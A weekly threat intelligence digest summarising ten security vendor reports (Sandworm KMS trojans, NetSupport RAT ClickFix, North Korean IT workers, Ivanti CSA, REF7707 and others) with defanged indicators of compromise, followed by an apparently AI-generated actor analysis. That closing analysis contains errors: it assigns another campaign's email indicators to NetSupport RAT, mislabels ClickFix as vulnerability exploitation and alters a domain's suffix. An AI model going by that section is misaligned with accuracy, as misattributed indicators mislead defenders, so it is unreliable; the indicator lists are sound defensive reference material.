Full Report
This is a weekly threat intelligence report review from RST Cloud. This week, we analysed 52 threat intelligence reports and compiled a brief summary along with the pertinent metadata extracted from them. You can find below a short summary of 10 reports, related threats, tools, threat actors, a link to the source, and a number of extracted indicators of compromise (IoCs) from the original reports. More granular information, including TTPs, on all reports is available via RST Report Hub.Title: Sandworm APT Targets Ukrainian Users with Trojanized Microsoft KMS Activation Tools in Cyber Espionage CampaignsLink: https://blog.eclecticiq.com/sandworm-apt-targets-ukrainian-users-with-trojanized-microsoft-kms-activation-tools-in-cyber-espionage-campaignsSummary: The KMS Update Campaign, identified as a malicious operation by the Russian threat actor Sandworm (APT44), specifically targets Ukrainian Windows users utilizing pirated Microsoft Key Management Service (KMS) activators. Active since late 2023, this campaign employs trojanized software to distribute the BACKORDER loader, which ultimately delivers the Dark Crystal RAT (DcRAT) for cyber espionage and data exfiltration. The BACKORDER loader disguises itself as a legitimate KMS tool, disabling security features like Windows Defender and manipulating system settings for stealthy operations. Additionally, the campaign includes the Kalambur RDP backdoor, which mimics a Windows Update and establishes covert communication channels for command and control. The activities attributed to Sandworm threaten not only individual users and businesses but also critical infrastructure in Ukraine, with historical precedents highlighting significant risks to national security.Threats: sandworm_group dcrat backorder kalambur uac-0145_group kmsauto_tool unc4166_group typosquatting_technique lolbas_technique lolbin_technique dwagent_toolIndicators of compromise:-------------------------ip: 5[.]255[.]122[.]118domain: kalambur[.]net, 2zilmiystfbjib2k4hvhpnv2uhni4ax5ce4xlpb7swkjimfnszxbkaid[.]onion, activationsmicrosoft[.]com, kmsupdate2023[.]com, kms-win11-update[.]net, windowsupdatesystem[.]org, ratiborus2023[.]com, onedrivestandaloneupdater[.]com, windowsdrivepack[.]com, akamaitechcdns[.]com, onedrivepack[.]comurl: https://activationsmicrosoft[.]com/activationsmicrosoft[.]php, https://btdig[.]com/172d3750e3617526563dd0b24c4ba88f907622b9, http://onedrivepack[.]com/pipe_RequestPollUpdateProcessAuthwordpress[.]phphash: - sha1=172d3750e3617526563dd0b24c4ba88f907622b9, - sha256=afc6131b17138a6132685617aa60293a40f2462dc3a810a4cf745977498e0255, - sha256=ed5735449a245355706fc58f4b744251f6e499833f02a972f9bd448c28467194, - sha256=fdc3f0516e1558cc4c9105ac23716f39a6708b8facada3a48609073a16a63c83, - sha256=48450c0a00b9d1ecce930eadbac27c3c80db73360bc099d3098c08567a59cdd3, - sha256=22c79153e0519f13b575f4bfc65a5280ff93e054099f9356a842ce3266e40c3d, - sha256=a42de97a466868efbfc4aa1ef08bfdb3cc5916d1accd59cfffff1a896d569412, - sha256=8cfa4f10944fc575420533b6b9bbcabbf3ae57fe60c6622883439dbb1aa60369, - sha256=8a4df53283a363c4dd67e2bda7a430af2766a59f8a2faf341da98987fe8d7cbd, - sha256=0e58d38fd2df86eeb4a556030a0996c04bd63e09e669b34d3bbc10558edf31a6, - sha256=5bff08a6aa7a7541c0b7b1660fd944cec55fa82df6285166f4da7a48b81f776e, - sha256=4b9e32327067a84d356acb8494dc05851dbf06ade961789a982a5505b9e061e3, - sha256=039c8dd066efa3dd7ac653689bfa07b2089ce4d8473c907547231c6dd2b136ec, - sha256=553f7f32c40626cbddd6435994aff8fc46862ef2ed8f705f2ad92f76e8a3af12, - sha256=d774b1d0f5bdb26e68e63dc93ba81a1cdf076524e29b4260b67542c06fbfe55c, - sha256=70cad07a082780caa130290fcbb1fd049d207777b587db6a5ee9ecf15659419f, - sha256=c5853083d4788a967548bee6cc81d998b0d709a240090cfed4ab530ece8b436e, - sha256=1a1ffcbab9bff4a033a26e8b9a08039955ac14ac5ce1f8fb22ff481109d781a7, - sha256=2de08a0924e3091b51b4451c694570c11969fb694a493e7f4d89290ae5600c2c, - sha256=4b0038de82868c7196969e91a4f7e94d0fa2b5efa7a905463afc01bfca4b8221, - sha256=7c0da4e314a550a66182f13832309f7732f93be4a31d97faa6b9a0b311b463ff, - sha256=a00beaa5228a153810b65151785596bebe2f09f77851c92989f620e37c60c935, - sha256=b45712acbadcd17cb35b8f8540ecc468b73cac9e31b91c8d6a84af90f10f29f8, - sha256=cd7c36a2f4797b9ca6e87ab44cb6c8b4da496cff29ed5bf727f0699917bae69a, - sha256=4b2e4466d1becfa40a3c65de41e5b4d2aa23324e321f727f3ba20943fd6de9e5, - sha256=aadd85e88c0ebb0a3af63d241648c0670599c3365ff7e5620eb8d06902fdde83, - sha256=7d92b10859cd9897d59247eb2ca6fb8ec52d8ce23a43ef99ff9d9de4605ca12b, - sha256=d13f0641fd98df4edcf839f0d498b6b6b29fbb8f0134a6dae3d9eb577d771589, - sha256=dd7a9d8d8f550a8091c79f2fb6a7b558062e66af852a612a1885c3d122f2591b, - sha256=70c91ffdc866920a634b31bf4a070fb3c3f947fc9de22b783d6f47a097fec2d8email:Title: NetSupport RAT Clickfix DistributionLink: https://www.esentire.com/security-advisories/netsupport-rat-clickfix-distributionSummary: From early January 2025, eSentire Threat Response Unit has reported a significant increase in incidents involving the NetSupport Remote Access Trojan (RAT), which allows attackers to gain extensive control over victims' systems. This malware exploits a technique known as "ClickFix," leveraging social engineering tactics to manipulate users into executing malicious PowerShell commands that install the RAT through deceptive browser alerts. The threat actors, identified as TA569 and SmartApe SG, utilize fake CAPTCHA pages to instruct users to download the NetSupport RAT client, which subsequently enables real-time monitoring, data exfiltration, and deployment of additional malware.Threats: netsupportmanager_rat clickfix_technique fakecaptcha_technique smartape_sg_group ta569_group smartapesg_campaignIndicators of compromise:-------------------------ip: 92[.]255[.]85[.]135domain: eveverify[.]com, findkik[.]com, sapeconomico[.]com, eiesoft[.]com, lynxcm[.]com, mellittler[.]com, hardcorelegends[.]com, fbinter[.]com, incomputersolutions[.]comurl: http://eveverify[.]com/captcha[.]html, http://findkik[.]com/Ray-verify[.]html, http://sapeconomico[.]com/captcha[.]html, https://eiesoft[.]com/Ray-verify[.]html, https://lynxcm[.]com/Ray-verify[.]html, http://mellittler[.]com/a/b[.]png, http://hardcorelegends[.]com/a/b[.]png, http://fbinter[.]com/a/b[.]png, http://fbinter[.]com/a/1[.]png, http://fbinter[.]com/a/2[.]png, http://fbinter[.]com/a/3[.]png, http://fbinter[.]com/a/4[.]png, http://fbinter[.]com/a/5[.]png, http://fbinter[.]com/a/6[.]png, http://fbinter[.]com/a/7[.]png, http://fbinter[.]com/a/8[.]png, http://fbinter[.]com/a/9[.]png, http://fbinter[.]com/a/10[.]png, http://fbinter[.]com/a/11[.]png, http://fbinter[.]com/a/12[.]png, http://incomputersolutions[.]com/o/o[.]png, http://92[.]255[.]85[.]135/fakeurl[.]htmhash: - sha256=06a0a243811e9c4738a9d413597659ca8d07b00f640b74adc9cb351c179b3268, - sha256=16a178b33877f9c3219bbe1685bfb879b7c8ab8965dbc734fd49ecb02e8c9d01email:Title: Inside the Scam: North Koreas IT Worker ThreatLink: https://go.recordedfuture.com/hubfs/reports/cta-nk-2025-0213.pdfSummary: PurpleBravo, a cyber threat group linked to North Korea, has focused its activities on the cryptocurrency sector, targeting entities such as a market-making firm, an online casino, and a blockchain software company. This group employs fraudulent IT personnel operating under false identities to exploit remote work environments, violating international sanctions and posing significant cybersecurity threats like fraud, data theft, and operational disruption. Their operations are supported by a network of at least seven front companies in China and include sophisticated malware such as BeaverTail, InvisibleFerret, and OtterCookie, aimed at gathering sensitive information and maintaining persistent access to compromised systems. A January 2025 indictment from the US Department of Justice revealed this group’s extensive operations, charging two North Korean nationals and three facilitators with targeting over 64 US companies and generating significant profits, thus showcasing the broad implications of their activities across various industries beyond cryptocurrency.Threats: famous_chollima_group contagious_interview_campaign beavertail invisibleferret ottercookie tag-121_group supply_chain_technique smuggling_technique spear-phishing_techniqueIndicators of compromise:-------------------------ip: 65[.]108[.]20[.]73, 147[.]124[.]214[.]237, 67[.]203[.]7[.]163, 147[.]124[.]214[.]129, 147[.]124[.]214[.]131, 23[.]106[.]70[.]154, 147[.]124[.]197[.]138, 66[.]235[.]168[.]232, 45[.]43[.]117[.]201, 38[.]92[.]47[.]85, 165[.]140[.]186[.]227, 38[.]92[.]47[.]151, 38[.]92[.]47[.]191, 66[.]235[.]168[.]238, 86[.]104[.]74[.]51, 147[.]124[.]197[.]149, 154[.]205[.]155[.]71, 67[.]203[.]7[.]205, 45[.]59[.]163[.]56, 66[.]235[.]175[.]109, 67[.]203[.]7[.]200, 103[.]151[.]8[.]45, 202[.]53[.]148[.]16, 180[.]235[.]135[.]180, 202[.]53[.]148[.]32, 180[.]235[.]135[.]184, 103[.]51[.]141[.]153, 103[.]51[.]141[.]152, 103[.]15[.]29[.]45, 202[.]53[.]148[.]132, 103[.]51[.]141[.]15domain: agencyhill99[.]com, huguotechltd[.]com, pengzhoudirading[.]com, xiwangtechltd[.]com, winuteachltd[.]com, diditechltd[.]com, deeseaulc[.]com, hisolution[.]io, hi-devs[.]com, pengzhoutrading[.]com, wuxiantechltd[.]com, deepsealuc[.]comurl: https://drive[.]google[.]com/uc?id=166zcmpqj-C7NPltm4iwRolz8XuxqZIXt, https://t[.]me/+2AurfGZWxZo0MDgx, http://65[.]108[.]20[.]73/BattleTank[.]exe, http://65[.]108[.]20[.]73:3000/BattleTank[.]exehash: - sha256=4e0034e2bd5a30db795b73991ab659bda6781af2a52297ad61cae8e14bf05f79, - sha256=7846a0a0aa90871f0503c430cc03488194ea7840196b3f7c9404e0a536dbb15e, - sha256=0621d37818c35e2557fdd8a729e50ea662ba518df8ca61a44cc3add5c6deb3cd, - sha256=d5c0b89e1dfbe9f5e5b2c3f745af895a36adf772f0b72a22052ae6dfa045cea6, - sha256=07183a60ebcb02546c53e82d92da3ddcf447d7a1438496c4437ec06b4d9eb287, - sha256=10f86be3e564f2e463e45420eb5f9fbdb14f7427eac665cd9cc7901efbc4cc59, - sha256=cde5afd20b7bb5c9457b68e02c13094125025fb974df425020361303dc6fcdfc, - sha256=d0a5b9dc988834cc930624661e6e7dd1943d480d75594fff0f4bc39d229c5999, - sha256=8de446957ce96826628c88da9fd4e7ff9d6327d8004afc4e9e86d59e7d6948dcemail: alexander@agencyhill99[.]com, vision[.]founder1004@gmail[.]com, ayt@agencyhill99[.]com, ysai@agencyhill99[.]com, sam@agencyhill99[.]com, admin@agencyhill99[.]com, hisolutions[.]soft@gmail[.]comTitle: Further insights into Ivanti CSA 4.6 vulnerabilities exploitationLink: https://harfanglab.io/insidethelab/insights-ivanti-csa-exploitation/Summary: CVE-2024-8963, a path traversal vulnerability in Ivanti's Cloud Service Appliance (CSA), allows remote unauthenticated attackers to access restricted functionalities by exploiting issues with URL parsing in the proprietary "broker" web server. Initially reported on September 19, 2024, further analysis linked the vulnerability to specific PHP configuration inconsistencies and escalated risks, enabling attackers to execute restricted PHP files and potentially exploit additional vulnerabilities, including CVE-2024-8190 and CVE-2024-9379. Notable cases of exploitation were documented from September to October 2024, revealing attackers deploying web shells for establishing persistence and utilizing familiar exploit techniques against targeted organizations in sectors like manufacturing, healthcare, and finance, particularly in the U.S. and France. The vulnerability highlights systemic weaknesses within web server design and configurations, indicating a possible organized effort among various threat actors to exploit these flaws for broader network access.Threats: behinder godzilla_webshell arl_tool landesk_tool grok upx_tool supershell fscan_tool zerologon_vuln reversessh_tool any_support_toolIndicators of compromise:-------------------------ip: 195[.]133[.]52[.]87, 8[.]218[.]239[.]22, 156[.]251[.]172[.]80domain: www[.]vip8025[.]mom, vip8806[.]mom, vip8025[.]mom, test[.]vip8025[.]momurl: hash: - sha256=32fd630be301090883ef0369e419f993562fbfa7af1449c0bf2c5e52403adbcd, - sha256=af3f4ece0d98999077cef265c1af9610b96cb7cf3264c115cc6c210cdd9636fe, - sha256=c64bd109100aac96eba627ca94c1161c8329378e3e8c75a1763c26b70c921891, - sha256=9f97997581f513166aae47b3664ca23c4f4ea90c24916874ff82891e2cd6e01e, - sha256=ae21cccc9cef126d164449370d5401f3e738d9e94ee4481dc198302718d37f01, - sha1=e7c52e54622168a737c5592894d85bec3758b0bd, - sha256=61928ff36c5d8983853ec2f411860b97231729f047527434d3b2db8bf0b42d25, - sha256=4c86e8c21451074a52cc8d60a262c683aaf4cb6b2634fea8efdd866ea2dbd3aa, - sha256=074739c7ccdee5baef649b7f7cb53668109be8f7e016294b66a5d1469803e42b, - sha256=7798b45ffc488356f7253805dc9c8d2210552bee39db9082f772185430360574, - sha256=cae96b72244855a3d98a42bb3f65daab1cd06e9be638553e2ebf1f8a66b5cc8a, - sha256=00109666ef878c6d61f1882bcf66e3c9ed60943ba8bc77b66de00f594174e3bb, - sha256=18556a794f5d47f93d375e257fa94b9fb1088f3021cf79cc955eb4c1813a95da, - sha1=3865e88feba340190780dd62d557d4ae04f9e6ddemail: keepalive-rssh@golang[.]orgTitle: Targeted Threats Research — South & North Korea (a breakdown of 3 years of civil society threat research in Korea)Link: https://www.0x0v1.com/targeted-threats-research-south-north-korea/Summary: The research highlights escalating cyber threats to civil society organizations (CSOs) in South Korea, particularly from North Korean Advanced Persistent Threats (APTs) like APT37 and Kimsuky, which have been targeting activists, journalists, and human rights defenders. These APTs employ sophisticated tactics, such as spear-phishing and the use of advanced malware like ROKRAT and the newly identified Android-based malware RambleOn, to collect sensitive information and infiltrate systems. The analysis underscores the critical role of CSOs in identifying these threats due to their direct interactions with victims, which provides valuable insights into attack methodologies and patterns, revealing a reliance on social engineering and specific vulnerabilities like CVE-2022-41128 for executing attacks, while also highlighting significant gaps in malware detection for these organizations.Threats: rokrat superbear rambleon scarcruft_group ucid902_group ollydbg_tool windbg_tool spear-phishing_technique kimsuky_group divulge_stealer credential_harvesting_technique dll_injection_technique rtf_template_inject_technique lazarus_group upx_toolIndicators of compromise:-------------------------ip: domain: ms-office[.]servicesurl: https://work3[.]b4a[.]app/download[.]html?id=88&search=TUh3M0xEZ3NPQzR4TERFd2ZHSnZaSGt1ZEdGaWJHVXFLazkwYUdWeWZIeGliMlI1TG5SaFlteGw=hash: - sha256=5fec6e533fb9741997530a3d43b60ee44e2e6dc0fd443ef135b9d311b73d92a8, - sha1=5de4215ba91bd52ae7371a049c23c8239302f3a5, md5=44b3f46a370faf94cc51386b4ccaab83, sha256=c49b4d370ad0dcd1e28ee8f525ac8e3c12a34cfcf62ebb733ec74cca59b29f82, - md5=83b97826c43808c5caa1b69c9c7cbeb0, sha256=6e3d7cdb6a506eba10f719c2ad5e5ef3d9a6bc84fb14789aa7c871200aa52816, sha1=375f71617fa5171a7ed24dacc1fd7f632a55eaabemail:Title: From South America to Southeast Asia: The Fragile Web ofREF7707Link: https://www.elastic.co/security-labs/fragile-web-ref7707Summary: The REF7707 campaign targets a South American foreign ministry, utilizing advanced techniques and novel malware families, including FINALDRAFT, GUIDLOADER, and PATHLOADER, initially identified through unusual endpoint behavior. FINALDRAFT serves as a remote administration tool that blends malicious command and control activities with legitimate Microsoft services, complicating detection efforts. The attackers employed various sophisticated methods, such as exploiting built-in Windows applications for file downloads, executing malicious activities through system-level scheduled tasks, and leveraging cloud services like Google Firebase and Pastebin for payload delivery, all of which demonstrate a high level of operational sophistication and a troubling ability to evade traditional security measures.Threats: ref7707_group seth_locker finaldraft guidloader pathloader lolbin_technique lolbas_technique credential_harvesting_technique siestagraph ref2924_groupIndicators of compromise:-------------------------ip: 47[.]83[.]8[.]198, 8[.]218[.]153[.]45, 45[.]91[.]133[.]254, 8[.]213[.]217[.]182, 47[.]239[.]0[.]216, 203[.]232[.]112[.]186domain: digert[.]ictnsc[.]com, support[.]vmphere[.]com, poster[.]checkponit[.]com, support[.]fortineat[.]com, update[.]hobiter[.]com, hobiter[.]com, vmphere[.]com, ictnsc[.]com, ict[.]ictnsc[.]com, autodiscovar[.]com, cloud[.]autodiscovar[.]com, d-links[.]net, vm-clouds[.]net, pol[.]vm-clouds[.]net, checkponit[.]comurl: hash: - sha256=08331f33d196ced23bb568689c950b39ff7734b7461d9501c404e2b1dc298cc1, - sha256=cffca467b6ff4dee8391c68650a53f4f3828a0b5a31a9aa501d2272b683205f9, - sha256=6d79dfb00da88bb20770ffad636c884bad515def4f8e97e9a9d61473297617e3, - sha256=83406905710e52f6af35b4b3c27549a12c28a628c492429d3a411fdb2d28cc8c, - sha256=39e85de1b1121dc38a33eca97c41dbd9210124162c6d669d28480c833e059530, - sha256=f45661ea4959a944ca2917454d1314546cc0c88537479e00550eef05bed5b1b9, - sha256=9a11d6fcf76583f7f70ff55297fb550fed774b61f35ee2edd95cf6f959853bcf, - sha256=41a3a518cc8abad677bb2723e05e2f052509a6f33ea75f32bd6603c96b721081, - sha256=d9fc1cab72d857b1e4852d414862ed8eab1d42960c1fd643985d352c148a6461, - sha256=f29779049f1fc2d45e43d866a845c45dc9aed6c2d9bbf99a8b1bdacfac2d52f2, - sha256=17b2c6723c11348ab438891bc52d0b29f38fc435c6ba091d4464f9f2a1b926e0, - sha256=20508edac0ca872b7977d1d2b04425aaa999ecf0b8d362c0400abb58bd686f92, - sha256=33f3a8ef2c5fbd45030385b634e40eaa264acbaeb7be851cbf04b62bbe575e75, - sha256=41141e3bdde2a7aebf329ec546745149144eff584b7fe878da7a2ad8391017b9, - sha256=49e383ab6d092ba40e12a255e37ba7997f26239f82bebcd28efaa428254d30e1, - sha256=5e3dbfd543909ff09e343339e4e64f78c874641b4fe9d68367c4d1024fe79249, - sha256=7cd14d3e564a68434e3b705db41bddeb51dbb7d5425fd901c5ec904dbb7b6af0, - sha256=842d6ddb7b26fdb1656235293ebf77c683608f8f312ed917074b30fbd5e8b43d, - sha256=f90420847e1f2378ac8c52463038724533a9183f02ce9ad025a6a10fd4327f12email:Title: You’ve Got Malware: FINALDRAFT Hides in Your DraftsLink: https://www.elastic.co/security-labs/finaldraftSummary: Elastic Security Labs has identified a new malware family known as REF7707, which targets a foreign ministry and utilizes Outlook via the Microsoft Graph API for command and control communications. The malware comprises a custom loader named PATHLOADER and a backdoor called FINALDRAFT, with variants for both Windows PE and Linux environments, highlighting its ongoing development. PATHLOADER downloads and executes encrypted shellcode while employing anti-analysis techniques to evade detection, while FINALDRAFT, a 64-bit C++ application, emphasizes data exfiltration and process manipulation, utilizing named pipes for communication and maintaining a dynamic structure for various operations. The investigation also noted a Linux variant of FINALDRAFT, which adapts functionalities to the Unix environment, albeit without certain Windows-specific capabilities.Threats: finaldraft ref7707_group pathloader process_injection_technique typosquatting_technique siestagraph powerpick_tool passthehash_technique mimikatz_toolIndicators of compromise:-------------------------ip: domain: poster[.]checkponit[.]com, support[.]fortineat[.]com, support[.]vmphere[.]com, update[.]hobiter[.]com, checkponit[.]com, fortineat[.]comurl: https://poster[.]checkponit[.]com:443/nzoMeFYgvjyXK3P, https://support[.]fortineat[.]com:443/nzoMeFYgvjyXK3P, http://poster[.]checkponit[.]com/nzoMeFYgvjyXK3Phash: - sha256=9a11d6fcf76583f7f70ff55297fb550fed774b61f35ee2edd95cf6f959853bcf, - sha256=39e85de1b1121dc38a33eca97c41dbd9210124162c6d669d28480c833e059530, - sha256=83406905710e52f6af35b4b3c27549a12c28a628c492429d3a411fdb2d28cc8cemail:Title: Tracking Pyramid C2: Identifying Post-Exploitation Servers in HuntLink: https://hunt.io/blog/tracking-pyramid-c2-identifying-post-exploitation-serversSummary: Pyramid is an open-source post-exploitation server released on GitHub in 2023, designed to evade endpoint detection and response (EDR) tools by leveraging Python's ubiquity. It functions as a Python-based HTTP/S server for command-and-control operations and facilitates in-memory execution of tools like BloodHound, contributing to its stealthiness. In December 2024, the DFIR Report highlighted that the threat actor group TA4557, or FIN6, utilized Pyramid alongside Cobalt Strike to target job seekers with malware, while GuidePoint Security connected a RansomHub affiliate to a similar Python-based backdoor. Recent scans identified nine IP addresses likened to Pyramid's infrastructure, with distinct HTTP headers confirming server interactions, reinforcing Pyramid's role in active cyber threats and illustrating the use of legitimate software frameworks by threat actors to avoid detection.Threats: pyramid_c2 bloodhound_tool secretsdump_tool lazagne_tool cobalt_strike magecart_group more_eggs ransomhubIndicators of compromise:-------------------------ip: 92[.]118[.]112[.]208, 45[.]82[.]85[.]50, 54[.]38[.]94[.]225, 38[.]146[.]28[.]93, 162[.]252[.]172[.]12, 104[.]238[.]61[.]144, 85[.]208[.]139[.]131, 38[.]180[.]195[.]187domain: devagroup[.]com[.]pl, thiscode[.]info, emdr-traumatherapie[.]infourl: hash: - sha256=54477efe7ddfa471efdcc83f2e1ffb5687ac9dca2bc8a2b86b253cdbb5cb9c84email:Title: The BadPilot campaign: Seashell Blizzard subgroup conducts multiyear global access operationLink: https://www.microsoft.com/en-us/security/blog/2025/02/12/the-badpilot-campaign-seashell-blizzard-subgroup-conducts-multiyear-global-access-operation/Summary: Microsoft has identified a subgroup of the Russian state actor Seashell Blizzard known as the "BadPilot campaign," which has been active since at least 2021 and primarily targets sensitive sectors like energy, telecommunications, and government worldwide. The group utilizes a variety of tactics, including exploitation of vulnerabilities in Internet-facing systems, with notable recent activities centered around vulnerabilities in ConnectWise ScreenConnect and Fortinet FortiClient EMS, as well as destructive attacks on organizations supporting Ukraine. Their methods involve credential harvesting and lateral movement within networks, leveraging tunneling utilities and modifications to network resources to maintain a persistent presence and increase their operational effectiveness.Threats: sandworm_group badpilot_campaign localolive chisel_tool connectwise_tool screenconnect_tool killdisk hermeticwiper supply_chain_technique eternal_petya prestige_ransomware cobalt_strike dcrat atera_tool splashtop_tool muddywater_group shadowlink_tool bitsadmin_tool procdump_tool cloaking_technique fancy_bear_group plink_tool rsockstun_tool aitm_technique sim_swapping_technique credential_harvesting_technique spear-phishing_technique proxyshell_vuln vssadmin_tool shadow_copies_delete_technique ntdsutil_tool nltest_toolIndicators of compromise:-------------------------ip: 103[.]201[.]129[.]130, 104[.]160[.]6[.]2, 195[.]26[.]87[.]209, 148[.]251[.]53[.]222, 89[.]149[.]200[.]91domain: hwupdates[.]com, cloud-sync[.]orgurl: hash: - sha256=c7379b2472b71ea0a2ba63cb7178769d27b27e1d00785bfadac0ae311cc88d8b, - sha256=b38f1906680c80e1606181b3ccb8539dab5af2a7222165c53cdd68d09ec8abb0, - sha256=9f3d8252e8f3169751a705151bdf675ac194bfd8457cbe08e1f3c17d7e9e9be2, - sha256=68c7aab670ee9d7461a4a8f06333994f251dc79813934166421091e2f1fa145c, - sha256=b9ef2e948a9b49a6930fc190b22cbdb3571579d37a4de56564e41a2ef736767b, - sha256=636e04f0618dd578d107f440b1cf6c910502d160130adae5e415b2dd2b36abcb, - sha256=17738a27bb307b3cb7bd571934a398223e170842005f1725c46c7075f14e90fe, - sha256=cab97e837a3fc095bf59703574cbfa7e60fb10991101ba9bfc9bbf294c18fd97email: akfcjweiopgjebvh@proton[.]me, ohipfdpoih@proton[.]me, miccraftsor@outlook[.]com, amymackenzie147@protonmail[.]ch, ehklsjkhvhbjl@proton[.]me, mirrowsimps@outlook[.]comTitle: China-linked Espionage Tools Used in Ransomware AttacksLink: https://www.security.com/threat-intelligence/chinese-espionage-ransomwareSummary: In late 2024, a sophisticated attack involving RA World ransomware targeted an Asian software and services company, utilizing tools associated with China-based espionage actors. The attack began with exploiting a vulnerability in Palo Alto's PAN-OS firewall (CVE-2024-0012) to gain access, followed by the theft of Amazon S3 cloud credentials and the deployment of a PlugX variant, identifying links to the Chinese group Fireant. This incident marks a notable shift in tactics, as it combines espionage techniques with ransomware motivations, indicating a potential evolution in the operational strategies of state-sponsored threat actors toward financially motivated cybercrime, as evidenced by the attackers' demand for a $2 million ransom.Threats: ra-group_group plugx_rat red_delta_group bronze_starlight_group lockbit atomsilo nightskyIndicators of compromise:-------------------------ip: 158[.]247[.]213[.]167, 154[.]223[.]18[.]123domain: plugins[.]jetbrians[.]net, police[.]tracksyscloud[.]com, caco[.]blueskyanalytics[.]neturl: hash: - sha256=c1e6955acdefa9769a7ae0c1abf54a26e2158154dd6ec07cc71eb06c575193d5, - sha256=18127cfd08cc49be08714d29e09ec130dcc0b19b7fcddc22c71d28fd245eb1b1, - sha256=e177eb358f93ccc1ac4694feb0139e82c62d767388872d359d7c2ed0a05c2726, - sha256=6ac81aa8d3f9d86ad5a18ea42fa1829b055dd25f123f9ee90002d64d4ef7a394, - sha256=2707612939677e8ea4709ecb4f45953d4a136a9934b6d0c256917383cdaef813, - sha256=38a26fffbab5297e4229897654d2f67c6ee52b316c7ac4d4a1493d187b49ec25, - sha256=bb5740d2129663ae1c46b1ea1bdd0b8c423b6eb8f6e6f2b0b158a9e833496a01email:This article was generated with the assistance of an artificial intelligence language model, ChatGPT.
Analysis Summary
# Threat Actor: Sandworm (APT44)
## Attribution & Identity
**Attribution:** Russian threat actor.
**Known Aliases and Associated Groups:** APT44, UAC-0145, UNC4166 (Mentioned in associated threats, but Sandworm is the primary focus of the summary).
## Activity Summary
Sandworm is conducting the **KMS Update Campaign**, which began in late 2023. This operation specifically targets Ukrainian Windows users who utilize pirated Microsoft Key Management Service (KMS) activators. The goal appears to be cyber espionage and data exfiltration.
## Tactics, Techniques & Procedures
- **Delivery Mechanism:** Trojanized Microsoft KMS activation software (typosquatting technique).
- **Loader:** Utilizes the **BACKORDER** loader disguised as a legitimate KMS tool.
- **System Manipulation:** Disables security features like Windows Defender and manipulates system settings for stealth.
- **Backdoor Deployment:** Deploys the **Kalambur RDP backdoor**, which mimics a Windows Update mechanism to establish covert C2 channels.
- **Techniques Mentioned:** Typosquatting, LOLBAS/LOLBIN usage (implied via disguising tools/updates).
## Targeting
- **Sectors:** Individual users, businesses, and critically, **critical infrastructure in Ukraine**.
- **Geography:** **Ukraine**.
- **Victims:** Ukrainian Windows users utilizing pirated software.
## Tools & Infrastructure
- **Malware Families Used:**
- BACKORDER (Loader)
- Dark Crystal RAT (DcRAT) (Payload)
- Kalambur RDP backdoor
- DWAGENT (Mentioned in associated threats)
- **Infrastructure (Defanged IOCs):**
- **Domains:** `kalambur[.]net`, `2zilmiystfbjib2k4hvhpnv2uhni4ax5ce4xlpb7swkjimfnszxbkaid[.]onion`, `activationsmicrosoft[.]com`, `kmsupdate2023[.]com`, `kms-win11-update[.]net`, `windowsupdatesystem[.]org`, `ratiborus2023[.]com`, `onedrivestandaloneupdater[.]com`, `windowsdrivepack[.]com`, `akamaitechcdns[.]com`, `onedrivepack[.]com`
- **IPs:** `5[.]255[.]122[.]118`
## Implications
The activities pose a significant threat to national security in Ukraine, given the targeting of critical infrastructure. The use of widely trusted avenues (KMS activators, Windows Updates) for malware delivery suggests a high potential for initial access and deep system compromise.
## Mitigations
- Users should avoid using pirated or unauthorized software activators (KMS tools).
- Maintain updated security software (Windows Defender) and monitor for signs of tampering or disabling.
- Monitor network traffic for connections to known C2 domains or unusual outbound communication mimicking Windows Update processes.
- Implement strict application whitelisting policies to limit execution from non-standard executables.
***
# Threat Actor: Unspecified Threat Actor (Using NetSupport RAT)
## Attribution & Identity
Not explicitly attributed to a specific APT named in the summary. Associated with observations by the eSentire Threat Response Unit.
## Activity Summary
Reported significant increase in incidents since early January 2025 involving the **NetSupport Remote Access Trojan (RAT)**. Attackers are leveraging a social engineering technique labeled **"ClickFix"** to manipulate users into executing malware, allowing attackers to control victim systems.
## Tactics, Techniques & Procedures
- **Delivery/Initial Access:** Exploitation of a known vulnerability in specific software installers (implied by "ClickFix" execution).
- **Technique:** **ClickFix** social engineering.
- **Impact:** Gain extensive control over victims' systems.
## Targeting
- **Sectors:** General, specific sectors not detailed in the provided text snippet.
- **Geography:** Not specified.
- **Victims:** Systems accessible via the exploited distribution method.
## Tools & Infrastructure
- **Malware Families Used:** NetSupport RAT
- **Infrastructure (Defanged IOCs):**
- **Email:** `akfcjweiopgjebvh@proton[.]me`, `ohipfdpoih@proton[.]me`, `miccraftsor@outlook[.]com`, `amymackenzie147@protonmail[.]ch`, `ehklsjkhvhbjl@proton[.]me`, `mirrowsimps@outlook[.]com`
## Implications
The prevalence of known commercial RATs like NetSupport, distributed via social engineering, indicates a persistent and easily adoptable threat vector utilized by various cybercriminals.
## Mitigations
- Increase user awareness training regarding social engineering tactics like "ClickFix."
- Deploy mechanisms to scrutinize and block execution stemming from manipulated installers or update prompts.
- Restrict the use and execution of known remote access tools unless explicitly authorized.
***
# Threat Actor: China-linked Espionage Actors / Fireant
## Attribution & Identity
**Attribution:** China-based espionage actors.
**Known Aliases and Associated Groups:** Fireant (linked via PlugX variant), RedDelta, BronzeStarlight (Mentioned in associated threats).
## Activity Summary
A sophisticated ransomware attack, utilizing the **RA World ransomware**, targeted an Asian software and services company in late 2024, demanding a \$2 million ransom. This campaign merged espionage techniques with financially motivated ransomware deployment.
## Tactics, Techniques & Procedures
- **Initial Access:** Exploited a vulnerability in **Palo Alto's PAN-OS firewall (CVE-2024-0012)**.
- **Post-Exploitation:** Stole **Amazon S3 cloud credentials**.
- **Deployment:** Deployed a **PlugX variant**.
- **Evolution:** Shift in tactics combining cyber espionage techniques with ransomware for financial gain.
## Targeting
- **Sectors:** Software and services company.
- **Geography:** Asia.
- **Victims:** An unspecified Asian software and services company.
## Tools & Infrastructure
- **Malware Families Used:**
- RA World (Ransomware)
- PlugX variant (Backdoor/Loader)
- **Infrastructure (Defanged IOCs):**
- **Domains:** `plugins[.]jetbrians[.]net`, `police[.]tracksyscloud[.]net`, `caco[.]blueskyanalytics[.]net`
- **IPs:** `158[.]247[.]213[.]167`, `154[.]223[.]18[.]123`
## Implications
This signals an evolution among state-sponsored actors, adopting ransomware for direct financial payoff rather than purely intelligence gathering, increasing the financial risk profile associated with these actors. Effective patching of perimeter defenses (like PAN-OS) is crucial.
## Mitigations
- Immediately patch Palo Alto PAN-OS instances against **CVE-2024-0012**.
- Implement strong credential hygiene for cloud environments (Amazon S3) using MFA and least privilege access.
- Enhance network monitoring to detect indicators related to PlugX activity post-exploitation.